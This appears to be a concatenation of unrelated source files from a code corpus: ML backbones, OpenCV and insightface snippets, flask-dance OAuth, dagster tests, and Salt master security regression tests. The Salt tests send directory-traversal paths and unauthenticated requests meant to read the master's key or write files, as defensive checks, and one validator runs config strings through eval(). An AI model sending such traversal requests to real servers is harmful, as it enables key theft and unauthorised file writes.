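#   app.prepare(ctx_id=0, det_size=(640, 640))
#   img = cv2.imread('people.jpg')
#   faces = app.get(img)
#   cv2.imwrite('people_out.jpg', app.draw_on(img, faces))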
the-stack_106_24384
#!/usr/bin/env python2.7 # -*- coding: utf-8 -*- import StatisticsValidator from hecatoncheir.exception import ValidationError from hecatoncheir.msgutil import gettext as _ class StatEvalValidator(StatisticsValidator.StatisticsValidator): """Validator for the min/max value v = StatEvalValidator('foo', [u'COL1', '{min} > 100']) s = {'row_count': 100, 'columns': [{ 'column_name': 'COL1', 'min': 101, 'max': 1000, 'cardinality': 10}]} assert v.validate(s) == True """ def __init__(self, label, rule): StatisticsValidator.StatisticsValidator.__init__(self, label, rule) def validate(self, stats): """Validate a min/max rule based the column statistics Args: stats (dict): a table statistics. see Data_Structure.txt for more info. Returns: True if the expression is true, otherwise False. """ # rule: [ column_name, expression ] assert len(self.rule) == 2 assert 'columns' in stats c = None for col in stats['columns']: if col['column_name'] == self.rule[0]: c = col break if c is None: raise ValidationError( _("Column `%s' not found. Check your validation rule again.") % self.rule[0], self.rule) assert 'row_count' in stats assert ('nulls' in c and 'min' in c and 'max' in c and 'cardinality' in c) kv = {'rows': stats['row_count'], 'nulls': c['nulls'], 'min': c['min'], 'max': c['max'], 'cardinality': c['cardinality']} self.statistics[0] += 1 try: s = self.rule[1].format(**kv) except KeyError as e: self.statistics[1] += 1 raise ValidationError( _("Parameter error: ") + "`%s'" % kv, self.rule) try: if eval(s) is False: self.statistics[1] += 1 return False except SyntaxError: self.statistics[1] += 1 raise ValidationError( _("Syntax error: ") + "`%s'" % s, self.rule) return True
the-stack_106_24385
# Copyright (c) 1999-2008 Mark D. Hill and David A. Wood # Copyright (c) 2009 The Hewlett-Packard Development Company # Copyright (c) 2010 Advanced Micro Devices, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from slicc.ast.StatementAST import StatementAST class StallAndWaitStatementAST(StatementAST): def __init__(self, slicc, in_port, address): super(StatementAST, self).__init__(slicc) self.in_port = in_port self.address = address def __repr__(self): return "[StallAndWaitStatementAst: %r]" % self.in_port def generate(self, code, return_type, **kwargs): self.in_port.assertType("InPort") self.address.assertType("Addr") in_port_code = self.in_port.var.code address_code = self.address.var.code code(''' stallBuffer(&($in_port_code), $address_code); $in_port_code.stallMessage($address_code, clockEdge()); ''')
the-stack_106_24386
import cv2

bitwise1 = cv2.imread("bitwise_1.png")
bitwise2 = cv2.imread("bitwise_2.png")

#bit_and = cv2.bitwise_and(bitwise1, bitwise2)
#bit_or = cv2.bitwise_or(bitwise1, bitwise2)
#bit_xor = cv2.bitwise_xor(bitwise1, bitwise2)
# bitwise_not takes a single source image; passing bitwise2 as the second
# positional argument would make it the destination and overwrite it.
bit_not = cv2.bitwise_not(bitwise1)

#cv2.imshow("and", bit_and)
#cv2.imshow("or", bit_or)
#cv2.imshow("xor", bit_xor)
cv2.imshow("not", bit_not)

cv2.imshow("1", bitwise1)
cv2.imshow("2", bitwise2)

cv2.waitKey(0)
cv2.destroyAllWindows()
the-stack_106_24389
import torch import torch.nn as nn import torch.utils.checkpoint as checkpoint from einops import rearrange from timm.models.layers import DropPath, to_2tuple, trunc_normal_ from ..utils.no_swin_unet_v2_utils import * from ..builder import BACKBONES from mmseg.utils import get_root_logger from mmcv_custom import load_checkpoint import copy import logging import math from os.path import join as pjoin @BACKBONES.register_module() class NoSwinUNetV2(nn.Module): def __init__(self, pretrain_img_size=224, patch_size=4, in_chans=3, num_classes=1000, embed_dim=96, depths=[2, 2, 2, 2], depths_decoder=[1, 2, 2, 2], num_heads=[3, 6, 12, 24], window_size=7, mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0., attn_drop_rate=0., drop_path_rate=0.1, norm_layer=nn.LayerNorm, ape=False, patch_norm=True, use_checkpoint=False, final_upsample="expand_first", **kwargs): super().__init__() self.num_classes = num_classes # self.zero_head = zero_head # self.config = config self.swin_unet = SwinTransformerSys(pretrain_img_size=pretrain_img_size, patch_size=patch_size, in_chans=in_chans, num_classes=self.num_classes, embed_dim=embed_dim, depths=depths, depths_decoder=depths_decoder, num_heads=num_heads, window_size=window_size, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale, drop_rate=drop_rate, attn_drop_rate=attn_drop_rate, drop_path_rate=drop_path_rate, norm_layer=norm_layer, ape=ape, patch_norm=patch_norm, use_checkpoint=use_checkpoint, final_upsample=final_upsample) def forward(self, x): if x.size()[1] == 1: x = x.repeat(1,3,1,1) logits = self.swin_unet(x) return logits def init_weights(self, pretrained=None): pretrained_path=pretrained if pretrained_path is not None: print("pretrained_path:{}".format(pretrained_path)) device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') pretrained_dict = torch.load(pretrained_path, map_location=device) if "model" not in pretrained_dict: print("---start load pretrained modle by splitting---") pretrained_dict = {k[17:]:v for k,v in pretrained_dict.items()} for k in list(pretrained_dict.keys()): if "output" in k: print("delete key:{}".format(k)) del pretrained_dict[k] msg = self.swin_unet.load_state_dict(pretrained_dict,strict=False) # print(msg) return pretrained_dict = pretrained_dict['model'] print("---start load pretrained modle of swin encoder---") model_dict = self.swin_unet.state_dict() full_dict = copy.deepcopy(pretrained_dict) for k, v in pretrained_dict.items(): if "layers." in k: current_layer_num = 3-int(k[7:8]) current_k = "layers_up." + str(current_layer_num) + k[8:] full_dict.update({current_k:v}) for k in list(full_dict.keys()): if k in model_dict: if full_dict[k].shape != model_dict[k].shape: print("delete:{};shape pretrain:{};shape model:{}".format(k,v.shape,model_dict[k].shape)) del full_dict[k] msg = self.swin_unet.load_state_dict(full_dict, strict=False) # print(msg) else: print("none pretrain")
the-stack_106_24390
"""Blueprint for connecting to Twitch API.""" from flask_dance.consumer import OAuth2ConsumerBlueprint from flask_dance.consumer.requests import OAuth2Session from functools import partial from flask.globals import LocalProxy, _lookup_app_object import os from flask import _app_ctx_stack as stack __maintainer__ = "Kerry Hatcher <[email protected]>" class ClientIdHeaderOAuth2Session(OAuth2Session): """ https://blog.twitch.tv/en/2016/05/05/client-id-required-for-kraken-api-calls-afbb8e95f843/ """ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.headers["client-id"] = self.client_id def make_twitch_blueprint( client_id=None, client_secret=None, scope=None, redirect_url=None, redirect_to=None, login_url=None, authorized_url=None, session_class=ClientIdHeaderOAuth2Session, storage=None, ): """Make a blueprint for authenticating with Twitch using OAuth 2. This requires a client ID and client secret from Twitch. You should either pass them to this constructor, or make sure that your Flask application config defines them, using the variables :envvar:`TWITCH_OAUTH_CLIENT_ID` and :envvar:`TWITCH_OAUTH_CLIENT_SECRET`. Args: client_id (str): The client ID for your application on Twitch. Defaults to app config "TWITCH_OAUTH_CLIENT_ID". client_secret (str): The client Secret for your application on Twitch. Defaults to app config "TWITCH_OAUTH_CLIENT_SECRET". scope (list, optional): Comma-separated list of scopes for the OAuth token. Defaults to None. redirect_url (str): the URL to redirect to after the authentication dance is complete redirect_to (str): if ``redirect_url`` is not defined, the name of the view to redirect to after the authentication dance is complete. The actual URL will be determined by :func:`flask.url_for` login_url (str, optional): the URL path for the ``login`` view. Defaults to ``/twitch`` authorized_url (str, optional): the URL path for the ``authorized`` view. Defaults to ``/twitch/authorized``. session_class (class, optional): The class to use for creating a Requests session. Defaults to :class:`~flask_dance.contrib.twitch.ClientIdHeaderOAuth2Session`. storage: A token storage class, or an instance of a token storage class, to use for this blueprint. Defaults to :class:`~flask_dance.consumer.storage.session.SessionStorage`. Returns: :class:`~flask_dance.consumer.OAuth2ConsumerBlueprint` A :ref:`blueprint <flask:blueprints>` to attach to your Flask app. """ twitch_bp = OAuth2ConsumerBlueprint( "twitch", __name__, client_id=client_id, client_secret=client_secret, scope=scope, base_url="https://api.twitch.tv/helix/", authorization_url="https://id.twitch.tv/oauth2/authorize", token_url="https://id.twitch.tv/oauth2/token", token_url_params={"include_client_id": True}, redirect_url=redirect_url, redirect_to=redirect_to, login_url=login_url, authorized_url=authorized_url, session_class=session_class, storage=storage, ) twitch_bp.from_config["client_id"] = "TWITCH_OAUTH_CLIENT_ID" twitch_bp.from_config["client_secret"] = "TWITCH_OAUTH_CLIENT_SECRET" # TODO: The key won't auto renew. See https://github.com/singingwolfboy/flask-dance/issues/35 # I think this will work but needs a test. twitch_bp.auto_refresh_url = twitch_bp.token_url twitch_bp.auto_refresh_kwargs = { "client_id": twitch_bp.client_id, "client_secret": twitch_bp.client_secret, } @twitch_bp.before_app_request def set_applocal_session(): ctx = stack.top ctx.twitch_oauth = twitch_bp.session return twitch_bp twitch = LocalProxy(partial(_lookup_app_object, "twitch_oauth"))
the-stack_106_24391
import pytest from dagster import ( DagsterInstance, Int, Output, OutputDefinition, check, composite_solid, execute_pipeline, lambda_solid, pipeline, solid, ) from dagster.core.definitions.pipeline_base import InMemoryPipeline from dagster.core.errors import ( DagsterInvalidConfigError, DagsterInvariantViolationError, DagsterUnknownStepStateError, ) from dagster.core.execution.api import create_execution_plan, execute_plan from dagster.core.execution.plan.outputs import StepOutputHandle from dagster.core.execution.plan.plan import should_skip_step from dagster.core.execution.retries import RetryMode from dagster.core.storage.pipeline_run import PipelineRun from dagster.core.utils import make_new_run_id def define_diamond_pipeline(): @lambda_solid def return_two(): return 2 @solid def add_three(num): return num + 3 @solid def mult_three(num): return num * 3 @solid def adder(left, right): return left + right @pipeline def diamond_pipeline(): two = return_two() adder(left=add_three(two), right=mult_three(two)) return diamond_pipeline def test_topological_sort(): plan = create_execution_plan(define_diamond_pipeline()) levels = plan.get_steps_to_execute_by_level() assert len(levels) == 3 assert [step.key for step in levels[0]] == ["return_two"] assert [step.key for step in levels[1]] == ["add_three", "mult_three"] assert [step.key for step in levels[2]] == ["adder"] def test_create_execution_plan_with_bad_inputs(): with pytest.raises(DagsterInvalidConfigError): create_execution_plan( define_diamond_pipeline(), run_config={"solids": {"add_three": {"inputs": {"num": 3}}}}, ) def test_active_execution_plan(): plan = create_execution_plan(define_diamond_pipeline()) with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_1.key) active_execution.mark_step_produced_output(StepOutputHandle(step_1.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 2 step_2 = steps[0] step_3 = steps[1] assert step_2.key == "add_three" assert step_3.key == "mult_three" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_2.key) active_execution.mark_step_produced_output(StepOutputHandle(step_2.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_3.key) active_execution.mark_step_produced_output(StepOutputHandle(step_3.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_4 = steps[0] assert step_4.key == "adder" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress assert not active_execution.is_complete active_execution.mark_success(step_4.key) assert active_execution.is_complete def test_failing_execution_plan(): pipeline_def = define_diamond_pipeline() plan = create_execution_plan(pipeline_def) with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_1.key) active_execution.mark_step_produced_output(StepOutputHandle(step_1.key, "result")) steps = 
active_execution.get_steps_to_execute() assert len(steps) == 2 step_2 = steps[0] step_3 = steps[1] assert step_2.key == "add_three" assert step_3.key == "mult_three" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_2.key) active_execution.mark_step_produced_output(StepOutputHandle(step_2.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress # uh oh failure active_execution.mark_failed(step_3.key) active_execution.mark_step_produced_output(StepOutputHandle(step_3.key, "result")) # cant progres to 4th step steps = active_execution.get_steps_to_execute() assert len(steps) == 0 assert not active_execution.is_complete steps = active_execution.get_steps_to_abandon() assert len(steps) == 1 step_4 = steps[0] assert step_4.key == "adder" active_execution.mark_abandoned(step_4.key) assert active_execution.is_complete def test_retries_active_execution(): pipeline_def = define_diamond_pipeline() plan = create_execution_plan(pipeline_def) with plan.start(retry_mode=(RetryMode.ENABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_up_for_retry(step_1.key) steps = active_execution.get_steps_to_execute() assert len(steps) == 1 assert steps[0].key == "return_two" active_execution.mark_up_for_retry(step_1.key) steps = active_execution.get_steps_to_execute() assert len(steps) == 1 assert steps[0].key == "return_two" active_execution.mark_success(step_1.key) active_execution.mark_step_produced_output(StepOutputHandle(step_1.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 2 step_2 = steps[0] step_3 = steps[1] assert step_2.key == "add_three" assert step_3.key == "mult_three" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_2.key) active_execution.mark_step_produced_output(StepOutputHandle(step_2.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress # uh oh failure active_execution.mark_failed(step_3.key) # cant progres to 4th step steps = active_execution.get_steps_to_execute() assert len(steps) == 0 assert not active_execution.is_complete steps = active_execution.get_steps_to_abandon() assert len(steps) == 1 step_4 = steps[0] assert step_4.key == "adder" active_execution.mark_abandoned(step_4.key) assert active_execution.is_complete def test_retries_disabled_active_execution(): pipeline_def = define_diamond_pipeline() plan = create_execution_plan(pipeline_def) with pytest.raises(check.CheckError): with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress # raises active_execution.mark_up_for_retry(step_1.key) def test_retries_deferred_active_execution(): pipeline_def = define_diamond_pipeline() plan = create_execution_plan(pipeline_def) with plan.start(retry_mode=(RetryMode.DEFERRED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress 
active_execution.mark_up_for_retry(step_1.key) steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress, retries are deferred assert not active_execution.is_complete steps = active_execution.get_steps_to_abandon() # skip split of diamond assert len(steps) == 2 _ = [active_execution.mark_abandoned(step.key) for step in steps] assert not active_execution.is_complete steps = active_execution.get_steps_to_abandon() # skip end of diamond assert len(steps) == 1 active_execution.mark_abandoned(steps[0].key) assert active_execution.is_complete def test_priorities(): @solid(tags={"priority": 5}) def pri_5(_): pass @solid(tags={"priority": 4}) def pri_4(_): pass @solid(tags={"priority": 3}) def pri_3(_): pass @solid(tags={"priority": 2}) def pri_2(_): pass @solid(tags={"priority": -1}) def pri_neg_1(_): pass @solid def pri_none(_): pass @pipeline def priorities(): pri_neg_1() pri_3() pri_2() pri_none() pri_5() pri_4() sort_key_fn = lambda step: int(step.tags.get("priority", 0)) * -1 plan = create_execution_plan(priorities) with plan.start(RetryMode.DISABLED, sort_key_fn) as active_execution: steps = active_execution.get_steps_to_execute() assert steps[0].key == "pri_5" assert steps[1].key == "pri_4" assert steps[2].key == "pri_3" assert steps[3].key == "pri_2" assert steps[4].key == "pri_none" assert steps[5].key == "pri_neg_1" _ = [active_execution.mark_skipped(step.key) for step in steps] def test_executor_not_created_for_execute_plan(): instance = DagsterInstance.ephemeral() pipe = define_diamond_pipeline() plan = create_execution_plan(pipe) pipeline_run = instance.create_run_for_pipeline(pipe, plan) results = execute_plan( plan, InMemoryPipeline(pipe), instance, pipeline_run, run_config={"execution": {"multiprocess": {}}}, ) for result in results: assert not result.is_failure def test_incomplete_execution_plan(): plan = create_execution_plan(define_diamond_pipeline()) with pytest.raises( DagsterInvariantViolationError, match="Execution of pipeline finished without completing the execution plan.", ): with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] active_execution.mark_success(step_1.key) # exit early def test_lost_steps(): plan = create_execution_plan(define_diamond_pipeline()) # run to completion - but step was in unknown state so exception thrown with pytest.raises(DagsterUnknownStepStateError): with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] # called by verify_complete when success / fail event not observed active_execution.mark_unknown_state(step_1.key) # failure assumed for start step - so rest should skip steps_to_abandon = active_execution.get_steps_to_abandon() while steps_to_abandon: _ = [active_execution.mark_abandoned(step.key) for step in steps_to_abandon] steps_to_abandon = active_execution.get_steps_to_abandon() assert active_execution.is_complete def test_fan_out_should_skip_step(): @solid( output_defs=[ OutputDefinition(Int, "out_1", is_required=False), OutputDefinition(Int, "out_2", is_required=False), OutputDefinition(Int, "out_3", is_required=False), ] ) def foo(_): yield Output(1, "out_1") @solid def bar(_, input_arg): return input_arg @pipeline def optional_outputs(): foo_res = foo() # pylint: disable=no-member bar.alias("bar_1")(input_arg=foo_res.out_1) bar.alias("bar_2")(input_arg=foo_res.out_2) 
bar.alias("bar_3")(input_arg=foo_res.out_3) instance = DagsterInstance.ephemeral() pipeline_run = PipelineRun(pipeline_name="optional_outputs", run_id=make_new_run_id()) execute_plan( create_execution_plan(optional_outputs, step_keys_to_execute=["foo"]), InMemoryPipeline(optional_outputs), instance, pipeline_run, ) assert not should_skip_step( create_execution_plan(optional_outputs, step_keys_to_execute=["bar_1"]), instance, pipeline_run.run_id, ) assert should_skip_step( create_execution_plan(optional_outputs, step_keys_to_execute=["bar_2"]), instance, pipeline_run.run_id, ) assert should_skip_step( create_execution_plan(optional_outputs, step_keys_to_execute=["bar_3"]), instance, pipeline_run.run_id, ) def test_fan_in_should_skip_step(): @lambda_solid def one(): return 1 @solid(output_defs=[OutputDefinition(is_required=False)]) def skip(_): return yield # pylint: disable=unreachable @solid def fan_in(_context, items): return items @composite_solid(output_defs=[OutputDefinition(is_required=False)]) def composite_all_upstream_skip(): return fan_in([skip(), skip()]) @composite_solid(output_defs=[OutputDefinition(is_required=False)]) def composite_one_upstream_skip(): return fan_in([one(), skip()]) @pipeline def optional_outputs_composite(): composite_all_upstream_skip() composite_one_upstream_skip() instance = DagsterInstance.ephemeral() pipeline_run = PipelineRun(pipeline_name="optional_outputs_composite", run_id=make_new_run_id()) execute_plan( create_execution_plan( optional_outputs_composite, step_keys_to_execute=[ "composite_all_upstream_skip.skip", "composite_all_upstream_skip.skip_2", ], ), InMemoryPipeline(optional_outputs_composite), instance, pipeline_run, ) # skip when all the step's sources weren't yield assert should_skip_step( create_execution_plan( optional_outputs_composite, step_keys_to_execute=["composite_all_upstream_skip.fan_in"], ), instance, pipeline_run.run_id, ) execute_plan( create_execution_plan( optional_outputs_composite, step_keys_to_execute=[ "composite_one_upstream_skip.one", "composite_one_upstream_skip.skip", ], ), InMemoryPipeline(optional_outputs_composite), instance, pipeline_run, ) # do not skip when some of the sources exist assert not should_skip_step( create_execution_plan( optional_outputs_composite, step_keys_to_execute=["composite_one_upstream_skip.fan_in"], ), instance, pipeline_run.run_id, ) def test_configured_input_should_skip_step(): called = {} @solid(output_defs=[OutputDefinition(is_required=False)]) def one(_): yield Output(1) @solid def solid_should_not_skip(_, input_one, input_two): # pylint: disable=unused-argument called["yup"] = True @pipeline def my_pipeline(): solid_should_not_skip(one()) run_config = {"solids": {"solid_should_not_skip": {"inputs": {"input_two": {"value": "2"}}}}} execute_pipeline(my_pipeline, run_config=run_config) assert called.get("yup") # ensure should_skip_step behave the same as execute_pipeline instance = DagsterInstance.ephemeral() pipeline_run = PipelineRun(pipeline_name="my_pipeline", run_id=make_new_run_id()) execute_plan( create_execution_plan( my_pipeline, step_keys_to_execute=["one"], run_config=run_config, ), InMemoryPipeline(my_pipeline), instance, pipeline_run, run_config=run_config, ) assert not should_skip_step( create_execution_plan( my_pipeline, step_keys_to_execute=["solid_should_not_skip"], run_config=run_config, ), instance, pipeline_run.run_id, )
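

# --- Added illustrative sketch (not one of the original tests) -----------------
# The cases above drive ActiveExecution by hand, one call at a time. The helper
# below is a hedged sketch of the generic loop they exercise: pull the steps that
# are ready, mark them successful together with their output, then abandon
# whatever can no longer run. Like the diamond-pipeline tests, it assumes every
# step has a single output named "result"; it is not part of the test suite.
def _drive_plan_to_completion_sketch(pipeline_def):
    plan = create_execution_plan(pipeline_def)
    with plan.start(retry_mode=RetryMode.DISABLED) as active_execution:
        while not active_execution.is_complete:
            steps = active_execution.get_steps_to_execute()
            for step in steps:
                # pretend the step ran and emitted its single "result" output
                active_execution.mark_success(step.key)
                active_execution.mark_step_produced_output(
                    StepOutputHandle(step.key, "result")
                )
            if not steps:
                # nothing runnable: give up on anything that became unreachable
                for step in active_execution.get_steps_to_abandon():
                    active_execution.mark_abandoned(step.key)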
the-stack_106_24392
import logging import os import shutil import tempfile import time import salt.master import salt.transport.client import salt.utils.files import salt.utils.platform import salt.utils.user from tests.support.case import TestCase from tests.support.mixins import AdaptedConfigurationTestCaseMixin from tests.support.runtests import RUNTIME_VARS log = logging.getLogger(__name__) class ConfigMixin: @classmethod def setUpClass(cls): cls.master_config = AdaptedConfigurationTestCaseMixin.get_config("master") cls.minion_config = AdaptedConfigurationTestCaseMixin.get_temp_config( "minion", id="root", transport=cls.master_config["transport"], auth_tries=1, auth_timeout=5, master_ip="127.0.0.1", master_port=cls.master_config["ret_port"], master_uri="tcp://127.0.0.1:{}".format(cls.master_config["ret_port"]), ) if not salt.utils.platform.is_windows(): user = cls.master_config["user"] else: user = salt.utils.user.get_specific_user().replace("\\", "_") if user.startswith("sudo_"): user = user.split("sudo_")[-1] cls.user = user cls.keyfile = ".{}_key".format(cls.user) cls.keypath = os.path.join(cls.master_config["cachedir"], cls.keyfile) with salt.utils.files.fopen(cls.keypath) as keyfd: cls.key = keyfd.read() @classmethod def tearDownClass(cls): del cls.master_config del cls.minion_config del cls.key del cls.keyfile del cls.keypath class ClearFuncsAuthTestCase(ConfigMixin, TestCase): def test_auth_info_not_allowed(self): assert hasattr(salt.master.ClearFuncs, "_prep_auth_info") clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = {"cmd": "_prep_auth_info"} rets = clear_channel.send(msg, timeout=15) ret_key = None for ret in rets: try: ret_key = ret[self.user] break except (TypeError, KeyError): pass assert ret_key != self.key, "Able to retrieve user key" class ClearFuncsPubTestCase(ConfigMixin, TestCase): def setUp(self): tempdir = tempfile.mkdtemp(dir=RUNTIME_VARS.TMP) self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True) self.tmpfile = os.path.join(tempdir, "evil_file") def tearDown(self): self.tmpfile = None def test_pub_not_allowed(self): assert hasattr(salt.master.ClearFuncs, "_send_pub") assert not os.path.exists(self.tmpfile) clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) jid = "202003100000000001" msg = { "cmd": "_send_pub", "fun": "file.write", "jid": jid, "arg": [self.tmpfile, "evil contents"], "kwargs": {"show_jid": False, "show_timeout": False}, "ret": "", "tgt": "minion", "tgt_type": "glob", "user": "root", } with salt.utils.event.get_event( "master", sock_dir=self.master_config["sock_dir"], transport=self.master_config["transport"], opts=self.master_config, ) as eventbus: ret = clear_channel.send(msg, timeout=15) if salt.utils.platform.is_windows(): time.sleep(30) timeout = 30 else: timeout = 5 ret_evt = None start = time.time() while time.time() - start <= timeout: raw = eventbus.get_event(timeout, auto_reconnect=True) if raw and "jid" in raw and raw["jid"] == jid: ret_evt = raw break assert not os.path.exists(self.tmpfile), "Evil file created" class ClearFuncsConfigTest(ConfigMixin, TestCase): def setUp(self): self.evil_file_path = os.path.join( os.path.dirname(self.master_config["conf_file"]), "evil.conf" ) def tearDown(self): try: os.remove(self.evil_file_path) except OSError: pass self.evil_file_path = None def test_clearfuncs_config(self): clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "key": self.key, "cmd": "wheel", "fun": 
"config.update_config", "file_name": "../evil", "yaml_contents": "win", } ret = clear_channel.send(msg, timeout=5) assert not os.path.exists( self.evil_file_path ), "Wrote file via directory traversal" assert ret["data"]["return"] == "Invalid path" class ClearFuncsFileRoots(ConfigMixin, TestCase): def setUp(self): self.file_roots_dir = self.master_config["file_roots"]["base"][0] self.target_dir = os.path.dirname(self.file_roots_dir) def tearDown(self): try: os.remove(os.path.join(self.target_dir, "pwn.txt")) except OSError: pass def test_fileroots_write(self): clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "key": self.key, "cmd": "wheel", "fun": "file_roots.write", "data": "win", "path": os.path.join("..", "pwn.txt"), "saltenv": "base", } ret = clear_channel.send(msg, timeout=5) assert not os.path.exists( os.path.join(self.target_dir, "pwn.txt") ), "Wrote file via directory traversal" def test_fileroots_read(self): readpath = os.path.relpath(self.keypath, self.file_roots_dir) relative_key_path = os.path.join(self.file_roots_dir, readpath) log.debug("Master root_dir: %s", self.master_config["root_dir"]) log.debug("File Root: %s", self.file_roots_dir) log.debug("Key Path: %s", self.keypath) log.debug("Read Path: %s", readpath) log.debug("Relative Key Path: %s", relative_key_path) log.debug("Absolute Read Path: %s", os.path.abspath(relative_key_path)) # If this asserion fails the test may need to be re-written assert os.path.abspath(relative_key_path) == self.keypath clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "key": self.key, "cmd": "wheel", "fun": "file_roots.read", "path": readpath, "saltenv": "base", } ret = clear_channel.send(msg, timeout=5) try: # When vulnerable this assertion will fail. assert ( list(ret["data"]["return"][0].items())[0][1] != self.key ), "Read file via directory traversal" except IndexError: pass # If the vulnerability is fixed, no data will be returned. assert ret["data"]["return"] == [] class ClearFuncsTokenTest(ConfigMixin, TestCase): def test_token(self): tokensdir = os.path.join(self.master_config["cachedir"], "tokens") assert os.path.exists(tokensdir), tokensdir clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "arg": [], "cmd": "get_token", "token": os.path.join("..", "minions", "minion", "data.p"), } ret = clear_channel.send(msg, timeout=5) assert "pillar" not in ret, "Read minion data via directory traversal"
the-stack_106_24393
import os

dir_names = ["butterfly", "sisl", "magent", "mpe", "atari"]

had_error = False
for name in dir_names:
    root_dir = os.path.join("pettingzoo", name)
    for _dir, subdirs, files in os.walk(root_dir):
        for file in files:
            if file.endswith(".py"):
                with open(os.path.join(_dir, file)) as f:
                    for line in f:
                        if line.lstrip().startswith("print"):
                            print(f"File: {os.path.join(_dir, file)} has a print statement. Please remove it.")
                            had_error = True
                            break

exit(-1 if had_error else 0)
the-stack_106_24395
# Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for working with OpenStack Cloud resources."""

from collections import OrderedDict

from absl import flags

from perfkitbenchmarker import vm_util
import six

FLAGS = flags.FLAGS


class OpenStackCLICommand(object):
    """An openstack cli command.

    Attributes:
      args: list of strings. Positional args to pass to openstack, typically
          specifying an operation to perform (e.g. ['image', 'list'] to list
          available images).
      flags: OrderedDict mapping flag name string to flag value. Flags to pass
          to openstack cli (e.g. {'os-compute-api-version': '2'}). If a provided
          value is True, the flag is passed to openstack cli without a value.
          If a provided value is a list, the flag is passed to openstack cli
          multiple times, once with each value in the list.
      additional_flags: list of strings. Additional flags to append unmodified
          to the end of the openstack cli command.
    """

    def __init__(self, resource, *args):
        """Initializes an OpenStackCLICommand with the provided args and common flags.

        Args:
          resource: An OpenStack resource of type BaseResource.
          *args: sequence of strings. Positional args to pass to openstack cli,
              typically specifying an operation to perform (e.g. ['image', 'list']
              to list available images).
        """
        self.args = list(args)
        self.flags = OrderedDict()
        self.additional_flags = []
        self._AddCommonFlags(resource)

